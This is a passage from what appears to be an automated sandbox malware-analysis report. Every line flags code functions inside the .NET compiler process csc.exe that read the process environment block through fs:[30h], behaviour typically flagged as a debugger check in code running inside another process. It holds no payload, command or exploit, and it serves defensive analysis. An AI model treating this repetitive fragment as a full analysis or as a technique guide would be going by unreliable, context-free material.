            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546866E mov eax, dword ptr fs:[00000030h]14_2_0546866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546866E mov eax, dword ptr fs:[00000030h]14_2_0546866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A3616 mov eax, dword ptr fs:[00000030h]14_2_053A3616
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A3616 mov eax, dword ptr fs:[00000030h]14_2_053A3616
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B260B mov eax, dword ptr fs:[00000030h]14_2_053B260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B260B mov eax, dword ptr fs:[00000030h]14_2_053B260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B260B mov eax, dword ptr fs:[00000030h]14_2_053B260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B260B mov eax, dword ptr fs:[00000030h]14_2_053B260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B260B mov eax, dword ptr fs:[00000030h]14_2_053B260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B260B mov eax, dword ptr fs:[00000030h]14_2_053B260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B260B mov eax, dword ptr fs:[00000030h]14_2_053B260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D1607 mov eax, dword ptr fs:[00000030h]14_2_053D1607
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DF603 mov eax, dword ptr fs:[00000030h]14_2_053DF603
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0541E609 mov eax, dword ptr fs:[00000030h]14_2_0541E609
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D2674 mov eax, dword ptr fs:[00000030h]14_2_053D2674
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DA660 mov eax, dword ptr fs:[00000030h]14_2_053DA660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DA660 mov eax, dword ptr fs:[00000030h]14_2_053DA660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D9660 mov eax, dword ptr fs:[00000030h]14_2_053D9660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D9660 mov eax, dword ptr fs:[00000030h]14_2_053D9660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05475636 mov eax, dword ptr fs:[00000030h]14_2_05475636
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BC640 mov eax, dword ptr fs:[00000030h]14_2_053BC640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0545F6C7 mov eax, dword ptr fs:[00000030h]14_2_0545F6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054616CC mov eax, dword ptr fs:[00000030h]14_2_054616CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054616CC mov eax, dword ptr fs:[00000030h]14_2_054616CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054616CC mov eax, dword ptr fs:[00000030h]14_2_054616CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054616CC mov eax, dword ptr fs:[00000030h]14_2_054616CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053976B2 mov eax, dword ptr fs:[00000030h]14_2_053976B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053976B2 mov eax, dword ptr fs:[00000030h]14_2_053976B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053976B2 mov eax, dword ptr fs:[00000030h]14_2_053976B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D66B0 mov eax, dword ptr fs:[00000030h]14_2_053D66B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539D6AA mov eax, dword ptr fs:[00000030h]14_2_0539D6AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539D6AA mov eax, dword ptr fs:[00000030h]14_2_0539D6AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DC6A6 mov eax, dword ptr fs:[00000030h]14_2_053DC6A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A4690 mov eax, dword ptr fs:[00000030h]14_2_053A4690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A4690 mov eax, dword ptr fs:[00000030h]14_2_053A4690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054336EE mov eax, dword ptr fs:[00000030h]14_2_054336EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054336EE mov eax, dword ptr fs:[00000030h]14_2_054336EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054336EE mov eax, dword ptr fs:[00000030h]14_2_054336EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054336EE mov eax, dword ptr fs:[00000030h]14_2_054336EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054336EE mov eax, dword ptr fs:[00000030h]14_2_054336EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054336EE mov eax, dword ptr fs:[00000030h]14_2_054336EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0541E6F2 mov eax, dword ptr fs:[00000030h]14_2_0541E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0541E6F2 mov eax, dword ptr fs:[00000030h]14_2_0541E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0541E6F2 mov eax, dword ptr fs:[00000030h]14_2_0541E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0541E6F2 mov eax, dword ptr fs:[00000030h]14_2_0541E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054206F1 mov eax, dword ptr fs:[00000030h]14_2_054206F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054206F1 mov eax, dword ptr fs:[00000030h]14_2_054206F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0545D6F0 mov eax, dword ptr fs:[00000030h]14_2_0545D6F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0542368C mov eax, dword ptr fs:[00000030h]14_2_0542368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0542368C mov eax, dword ptr fs:[00000030h]14_2_0542368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0542368C mov eax, dword ptr fs:[00000030h]14_2_0542368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0542368C mov eax, dword ptr fs:[00000030h]14_2_0542368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D36EF mov eax, dword ptr fs:[00000030h]14_2_053D36EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CD6E0 mov eax, dword ptr fs:[00000030h]14_2_053CD6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CD6E0 mov eax, dword ptr fs:[00000030h]14_2_053CD6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D16CF mov eax, dword ptr fs:[00000030h]14_2_053D16CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AB6C0 mov eax, dword ptr fs:[00000030h]14_2_053AB6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AB6C0 mov eax, dword ptr fs:[00000030h]14_2_053AB6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AB6C0 mov eax, dword ptr fs:[00000030h]14_2_053AB6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AB6C0 mov eax, dword ptr fs:[00000030h]14_2_053AB6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AB6C0 mov eax, dword ptr fs:[00000030h]14_2_053AB6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AB6C0 mov eax, dword ptr fs:[00000030h]14_2_053AB6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DA6C7 mov ebx, dword ptr fs:[00000030h]14_2_053DA6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DA6C7 mov eax, dword ptr fs:[00000030h]14_2_053DA6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05434144 mov eax, dword ptr fs:[00000030h]14_2_05434144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05434144 mov eax, dword ptr fs:[00000030h]14_2_05434144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05434144 mov ecx, dword ptr fs:[00000030h]14_2_05434144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05434144 mov eax, dword ptr fs:[00000030h]14_2_05434144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05434144 mov eax, dword ptr fs:[00000030h]14_2_05434144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A1131 mov eax, dword ptr fs:[00000030h]14_2_053A1131
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A1131 mov eax, dword ptr fs:[00000030h]14_2_053A1131
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539B136 mov eax, dword ptr fs:[00000030h]14_2_0539B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539B136 mov eax, dword ptr fs:[00000030h]14_2_0539B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539B136 mov eax, dword ptr fs:[00000030h]14_2_0539B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539B136 mov eax, dword ptr fs:[00000030h]14_2_0539B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05475152 mov eax, dword ptr fs:[00000030h]14_2_05475152
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D0124 mov eax, dword ptr fs:[00000030h]14_2_053D0124
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05439179 mov eax, dword ptr fs:[00000030h]14_2_05439179
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F172 mov eax, dword ptr fs:[00000030h]14_2_0539F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F172 mov eax, dword ptr fs:[00000030h]14_2_0539F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F172 mov eax, dword ptr fs:[00000030h]14_2_0539F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F172 mov eax, dword ptr fs:[00000030h]14_2_0539F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F172 mov eax, dword ptr fs:[00000030h]14_2_0539F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F172 mov eax, dword ptr fs:[00000030h]14_2_0539F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F172 mov eax, dword ptr fs:[00000030h]14_2_0539F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F172 mov eax, dword ptr fs:[00000030h]14_2_0539F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F172 mov eax, dword ptr fs:[00000030h]14_2_0539F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F172 mov eax, dword ptr fs:[00000030h]14_2_0539F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F172 mov eax, dword ptr fs:[00000030h]14_2_0539F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F172 mov eax, dword ptr fs:[00000030h]14_2_0539F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F172 mov eax, dword ptr fs:[00000030h]14_2_0539F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F172 mov eax, dword ptr fs:[00000030h]14_2_0539F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F172 mov eax, dword ptr fs:[00000030h]14_2_0539F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F172 mov eax, dword ptr fs:[00000030h]14_2_0539F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F172 mov eax, dword ptr fs:[00000030h]14_2_0539F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F172 mov eax, dword ptr fs:[00000030h]14_2_0539F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F172 mov eax, dword ptr fs:[00000030h]14_2_0539F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F172 mov eax, dword ptr fs:[00000030h]14_2_0539F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F172 mov eax, dword ptr fs:[00000030h]14_2_0539F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05460115 mov eax, dword ptr fs:[00000030h]14_2_05460115
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0544A118 mov ecx, dword ptr fs:[00000030h]14_2_0544A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0544A118 mov eax, dword ptr fs:[00000030h]14_2_0544A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0544A118 mov eax, dword ptr fs:[00000030h]14_2_0544A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0544A118 mov eax, dword ptr fs:[00000030h]14_2_0544A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A7152 mov eax, dword ptr fs:[00000030h]14_2_053A7152
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A6154 mov eax, dword ptr fs:[00000030h]14_2_053A6154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A6154 mov eax, dword ptr fs:[00000030h]14_2_053A6154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539C156 mov eax, dword ptr fs:[00000030h]14_2_0539C156
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05399148 mov eax, dword ptr fs:[00000030h]14_2_05399148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05399148 mov eax, dword ptr fs:[00000030h]14_2_05399148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05399148 mov eax, dword ptr fs:[00000030h]14_2_05399148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05399148 mov eax, dword ptr fs:[00000030h]14_2_05399148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054661C3 mov eax, dword ptr fs:[00000030h]14_2_054661C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054661C3 mov eax, dword ptr fs:[00000030h]14_2_054661C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BB1B0 mov eax, dword ptr fs:[00000030h]14_2_053BB1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054751CB mov eax, dword ptr fs:[00000030h]14_2_054751CB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0541E1D0 mov eax, dword ptr fs:[00000030h]14_2_0541E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0541E1D0 mov eax, dword ptr fs:[00000030h]14_2_0541E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0541E1D0 mov ecx, dword ptr fs:[00000030h]14_2_0541E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0541E1D0 mov eax, dword ptr fs:[00000030h]14_2_0541E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0541E1D0 mov eax, dword ptr fs:[00000030h]14_2_0541E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054761E5 mov eax, dword ptr fs:[00000030h]14_2_054761E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539A197 mov eax, dword ptr fs:[00000030h]14_2_0539A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539A197 mov eax, dword ptr fs:[00000030h]14_2_0539A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539A197 mov eax, dword ptr fs:[00000030h]14_2_0539A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053F7190 mov eax, dword ptr fs:[00000030h]14_2_053F7190
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E0185 mov eax, dword ptr fs:[00000030h]14_2_053E0185
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D01F8 mov eax, dword ptr fs:[00000030h]14_2_053D01F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0545C188 mov eax, dword ptr fs:[00000030h]14_2_0545C188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0545C188 mov eax, dword ptr fs:[00000030h]14_2_0545C188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C51EF mov eax, dword ptr fs:[00000030h]14_2_053C51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C51EF mov eax, dword ptr fs:[00000030h]14_2_053C51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C51EF mov eax, dword ptr fs:[00000030h]14_2_053C51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C51EF mov eax, dword ptr fs:[00000030h]14_2_053C51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C51EF mov eax, dword ptr fs:[00000030h]14_2_053C51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C51EF mov eax, dword ptr fs:[00000030h]14_2_053C51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C51EF mov eax, dword ptr fs:[00000030h]14_2_053C51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C51EF mov eax, dword ptr fs:[00000030h]14_2_053C51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C51EF mov eax, dword ptr fs:[00000030h]14_2_053C51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C51EF mov eax, dword ptr fs:[00000030h]14_2_053C51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C51EF mov eax, dword ptr fs:[00000030h]14_2_053C51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C51EF mov eax, dword ptr fs:[00000030h]14_2_053C51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C51EF mov eax, dword ptr fs:[00000030h]14_2_053C51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A51ED mov eax, dword ptr fs:[00000030h]14_2_053A51ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0542019F mov eax, dword ptr fs:[00000030h]14_2_0542019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0542019F mov eax, dword ptr fs:[00000030h]14_2_0542019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0542019F mov eax, dword ptr fs:[00000030h]14_2_0542019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0542019F mov eax, dword ptr fs:[00000030h]14_2_0542019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054511A4 mov eax, dword ptr fs:[00000030h]14_2_054511A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054511A4 mov eax, dword ptr fs:[00000030h]14_2_054511A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054511A4 mov eax, dword ptr fs:[00000030h]14_2_054511A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054511A4 mov eax, dword ptr fs:[00000030h]14_2_054511A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DD1D0 mov eax, dword ptr fs:[00000030h]14_2_053DD1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DD1D0 mov ecx, dword ptr fs:[00000030h]14_2_053DD1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539A020 mov eax, dword ptr fs:[00000030h]14_2_0539A020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539C020 mov eax, dword ptr fs:[00000030h]14_2_0539C020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0544705E mov ebx, dword ptr fs:[00000030h]14_2_0544705E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0544705E mov eax, dword ptr fs:[00000030h]14_2_0544705E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05475060 mov eax, dword ptr fs:[00000030h]14_2_05475060
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0542106E mov eax, dword ptr fs:[00000030h]14_2_0542106E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BE016 mov eax, dword ptr fs:[00000030h]14_2_053BE016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BE016 mov eax, dword ptr fs:[00000030h]14_2_053BE016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BE016 mov eax, dword ptr fs:[00000030h]14_2_053BE016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BE016 mov eax, dword ptr fs:[00000030h]14_2_053BE016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0541D070 mov ecx, dword ptr fs:[00000030h]14_2_0541D070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B1070 mov eax, dword ptr fs:[00000030h]14_2_053B1070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B1070 mov ecx, dword ptr fs:[00000030h]14_2_053B1070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B1070 mov eax, dword ptr fs:[00000030h]14_2_053B1070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B1070 mov eax, dword ptr fs:[00000030h]14_2_053B1070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B1070 mov eax, dword ptr fs:[00000030h]14_2_053B1070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B1070 mov eax, dword ptr fs:[00000030h]14_2_053B1070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B1070 mov eax, dword ptr fs:[00000030h]14_2_053B1070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B1070 mov eax, dword ptr fs:[00000030h]14_2_053B1070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B1070 mov eax, dword ptr fs:[00000030h]14_2_053B1070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B1070 mov eax, dword ptr fs:[00000030h]14_2_053B1070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B1070 mov eax, dword ptr fs:[00000030h]14_2_053B1070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B1070 mov eax, dword ptr fs:[00000030h]14_2_053B1070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B1070 mov eax, dword ptr fs:[00000030h]14_2_053B1070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CC073 mov eax, dword ptr fs:[00000030h]14_2_053CC073
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A2050 mov eax, dword ptr fs:[00000030h]14_2_053A2050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CB052 mov eax, dword ptr fs:[00000030h]14_2_053CB052
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546903E mov eax, dword ptr fs:[00000030h]14_2_0546903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546903E mov eax, dword ptr fs:[00000030h]14_2_0546903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546903E mov eax, dword ptr fs:[00000030h]14_2_0546903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546903E mov eax, dword ptr fs:[00000030h]14_2_0546903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0541D0C0 mov eax, dword ptr fs:[00000030h]14_2_0541D0C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0541D0C0 mov eax, dword ptr fs:[00000030h]14_2_0541D0C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054220DE mov eax, dword ptr fs:[00000030h]14_2_054220DE
